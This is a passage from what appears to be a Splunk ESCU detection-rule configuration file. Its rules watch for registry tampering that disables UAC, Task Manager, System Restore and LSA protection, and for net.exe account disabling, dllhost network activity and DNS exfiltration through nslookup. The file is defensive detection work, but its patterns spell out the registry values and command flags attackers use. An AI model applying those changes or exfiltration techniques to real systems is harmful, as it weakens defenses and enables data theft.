search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFolderOptions" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_folderoptions_windows_feature_filter`

[ESCU - Disabling Net User Account - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies a suspicious command line that disables a user account using the `net.exe` utility native to Windows. This technique may be used by adversaries to interrupt the availability of such users as part of their malicious activity.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1531"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic identifies a suspicious command line that disables a user account using the `net.exe` utility native to Windows. This technique may be used by adversaries to interrupt the availability of such users as part of their malicious activity.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-05-04
action.escu.modification_date = 2021-05-04
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disabling Net User Account - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["XMRig"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified disabling a user account on endpoint $dest$ by user $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 42}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disabling Net User Account - Rule
action.correlationsearch.annotations = {"analytic_story": ["XMRig"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1531"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic identifies a suspicious command line that disables a user account using the `net.exe` utility native to Windows. This technique may be used by adversaries to interrupt the availability of such users as part of their malicious activity.
action.notable.param.rule_title = Disabling Net User Account
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.parent_process) as parent_process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` AND Processes.process="*user*" AND Processes.process="*/active:no*" by Processes.process_name Processes.original_file_name Processes.dest Processes.user Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_net_user_account_filter`

[ESCU - Disabling NoRun Windows App - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search identifies a registry modification that disables the Run application in the Windows Start menu. This application is known to be a helpful shortcut for Windows OS users to run known applications and also to execute reg or batch scripts. This technique is used by malware to make cleaning up its infection harder by preventing known applications from being run easily through the Run shortcut.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search identifies a registry modification that disables the Run application in the Windows Start menu. This application is known to be a helpful shortcut for Windows OS users to run known applications and also to execute reg or batch scripts. This technique is used by malware to make cleaning up its infection harder by preventing known applications from being run easily through the Run shortcut.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An admin may disable this application for non-technical users.
action.escu.creation_date = 2023-04-27
action.escu.modification_date = 2023-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disabling NoRun Windows App - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = The Windows registry was modified to disable the Run application in the Windows Start menu on $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disabling NoRun Windows App - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search identifies a registry modification that disables the Run application in the Windows Start menu. This application is known to be a helpful shortcut for Windows OS users to run known applications and also to execute reg or batch scripts. This technique is used by malware to make cleaning up its infection harder by preventing known applications from being run easily through the Run shortcut.
action.notable.param.rule_title = Disabling NoRun Windows App
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_norun_windows_app_filter`

[ESCU - Disabling Remote User Account Control - Rule]
action.escu = 0
action.escu.enabled = 1
description = The search looks for modifications to registry keys that control the enforcement of Windows User Account Control (UAC).
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The search looks for modifications to registry keys that control the enforcement of Windows User Account Control (UAC).
action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the Endpoint data model in the Registry node. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or via other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report registry modifications.
action.escu.known_false_positives = This registry key may be modified by administrators to implement a change in system policy. This type of change should be a very rare occurrence.
action.escu.creation_date = 2020-11-18
action.escu.modification_date = 2020-11-18
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disabling Remote User Account Control - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Suspicious Windows Registry Activities", "Remcos", "Windows Registry Abuse", "Azorult", "AgentTesla"]
action.risk = 1
action.risk.param._risk_message = The Windows registry keys that control the enforcement of Windows User Account Control (UAC) were modified on $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disabling Remote User Account Control - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Suspicious Windows Registry Activities", "Remcos", "Windows Registry Abuse", "Azorult", "AgentTesla"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The search looks for modifications to registry keys that control the enforcement of Windows User Account Control (UAC).
action.notable.param.rule_title = Disabling Remote User Account Control
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path=*HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA* Registry.registry_value_data="0x00000000" by Registry.dest, Registry.registry_key_name Registry.user Registry.registry_path Registry.registry_value_data Registry.action | `drop_dm_object_name(Registry)` | `disabling_remote_user_account_control_filter`

[ESCU - Disabling SystemRestore In Registry - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following search identifies registry modifications related to disabling System Restore on a machine. This event or behavior is seen in some RAT malware to make restoring the infected machine difficult and to keep the infection on the box.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following search identifies registry modifications related to disabling System Restore on a machine. This event or behavior is seen in some RAT malware to make restoring the infected machine difficult and to keep the infection on the box.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = In some cases an admin can disable System Restore on a machine.
action.escu.creation_date = 2024-02-14
action.escu.modification_date = 2024-02-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disabling SystemRestore In Registry - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"]
action.risk = 1
action.risk.param._risk_message = The Windows registry was modified to disable System Restore on $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disabling SystemRestore In Registry - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following search identifies registry modifications related to disabling System Restore on a machine. This event or behavior is seen in some RAT malware to make restoring the infected machine difficult and to keep the infection on the box.
action.notable.param.rule_title = Disabling SystemRestore In Registry
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableSR" OR Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableConfig" OR Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\\DisableSR" OR Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\\DisableConfig" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_systemrestore_in_registry_filter`

[ESCU - Disabling Task Manager - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search identifies a registry modification that disables the Task Manager of the Windows operating system. This event or technique is commonly seen in malware such as RATs, Trojans, TrojanSpy or worms to prevent the user from terminating their process.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search identifies a registry modification that disables the Task Manager of the Windows operating system. This event or technique is commonly seen in malware such as RATs, Trojans, TrojanSpy or worms to prevent the user from terminating their process.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An admin may disable this application for non-technical users.
action.escu.creation_date = 2023-04-27
action.escu.modification_date = 2023-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disabling Task Manager - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"]
action.risk = 1
action.risk.param._risk_message = The Windows Task Manager was disabled on $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disabling Task Manager - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search identifies a registry modification that disables the Task Manager of the Windows operating system. This event or technique is commonly seen in malware such as RATs, Trojans, TrojanSpy or worms to prevent the user from terminating their process.
action.notable.param.rule_title = Disabling Task Manager action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_task_manager_filter` [ESCU - Disabling Windows Local Security Authority Defences via Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection looks for the deletion of registry keys which disable LSA protection and MS Defender Device Guard. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This detection looks for the deletion of registry keys which disable LSA protection and MS Defender Device Guard. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. 
These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Potential to be triggered by an administrator disabling protections for troubleshooting purposes. action.escu.creation_date = 2024-03-14 action.escu.modification_date = 2024-03-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Disabling Windows Local Security Authority Defences via Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = An attempt to disable Windows LSA defences was detected on $dest$. The reg key $registry_path$ was deleted by $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 60}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 60}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disabling Windows Local Security Authority Defences via Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 60, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection looks for the deletion of registry keys which disable LSA protection and MS Defender Device Guard. action.notable.param.rule_title = Disabling Windows Local Security Authority Defences via Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as _time from datamodel=Endpoint.Registry where Registry.registry_path IN ("*\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\LsaCfgFlags", "*\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard\\*", "*\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\RunAsPPL") Registry.action IN (deleted, unknown) by Registry.action Registry.registry_path Registry.process_guid Registry.dest Registry.user| `drop_dm_object_name(Registry)` | join type=outer process_guid [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes by Processes.user Processes.process_name 
Processes.process Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)`] | table _time action dest user parent_process_name parent_process process_name process process_guid registry_path | `disabling_windows_local_security_authority_defences_via_registry_filter` [ESCU - DLLHost with no Command Line Arguments with Network - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies DLLHost.exe with no command line arguments with a network connection. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint", "Network_Traffic"] action.escu.eli5 = The following analytic identifies DLLHost.exe with no command line arguments with a network connection. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. 
DLLHost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate third party applications may use a moved copy of dllhost, triggering a false positive. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - DLLHost with no Command Line Arguments with Network - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = The process $process_name$ was spawned by $parent_process_name$ without any command-line arguments on $src$ by $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "parent_image", "risk_object_type": "other", "risk_score": 49}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - DLLHost with no Command Line Arguments with Network - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies DLLHost.exe with no command line arguments with a network connection. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. 
action.notable.param.rule_title = DLLHost with no Command Line Arguments with Network action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.process_name=dllhost.exe Processes.action!="blocked" by host _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name Processes.parent_process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(dllhost\.exe.{0,4}$)" | rename dest as src | join host process_id [| tstats `security_content_summariesonly` count latest(All_Traffic.dest) as dest latest(All_Traffic.dest_ip) as dest_ip latest(All_Traffic.dest_port) as dest_port FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by host All_Traffic.process_id | `drop_dm_object_name(All_Traffic)`] | `dllhost_with_no_command_line_arguments_with_network_filter` [ESCU - DNS Exfiltration Using Nslookup App - Rule] action.escu = 0 action.escu.enabled = 1 description = this search is to detect potential DNS exfiltration using nslookup application. This technique are seen in couple of malware and APT group to exfiltrated collected data in a infected machine or infected network. This detection is looking for unique use of nslookup where it tries to use specific record type, TXT, A, AAAA, that are commonly used by attacker and also the retry parameter which is designed to query C2 DNS multiple tries. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = this search is to detect potential DNS exfiltration using nslookup application. This technique are seen in couple of malware and APT group to exfiltrated collected data in a infected machine or infected network. This detection is looking for unique use of nslookup where it tries to use specific record type, TXT, A, AAAA, that are commonly used by attacker and also the retry parameter which is designed to query C2 DNS multiple tries. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
action.escu.known_false_positives = admin nslookup usage action.escu.creation_date = 2021-04-15 action.escu.modification_date = 2021-04-15 action.escu.confidence = high action.escu.full_search_name = ESCU - DNS Exfiltration Using Nslookup App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious DNS Traffic", "Dynamic DNS", "Data Exfiltration", "Command And Control"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ performing activity related to DNS exfiltration. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 72}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - DNS Exfiltration Using Nslookup App - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious DNS Traffic", "Dynamic DNS", "Data Exfiltration", "Command And Control"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = this search is to detect potential DNS exfiltration using nslookup application. 
This technique are seen in couple of malware and APT group to exfiltrated collected data in a infected machine or infected network. This detection is looking for unique use of nslookup where it tries to use specific record type, TXT, A, AAAA, that are commonly used by attacker and also the retry parameter which is designed to query C2 DNS multiple tries. action.notable.param.rule_title = DNS Exfiltration Using Nslookup App action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id values(Processes.parent_process) as parent_process count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "nslookup.exe" Processes.process = "*-querytype=*" OR Processes.process="*-qt=*" OR Processes.process="*-q=*" OR Processes.process="-type=*" OR Processes.process="*-retry=*" by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dns_exfiltration_using_nslookup_app_filter` [ESCU - Domain Account Discovery with Dsquery - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `dsquery.exe` with command-line arguments utilized to discover domain users. The `user` argument returns a list of all users registered in the domain. Red Teams and adversaries alike engage in remote system discovery for situational awareness and Active Directory Discovery. 
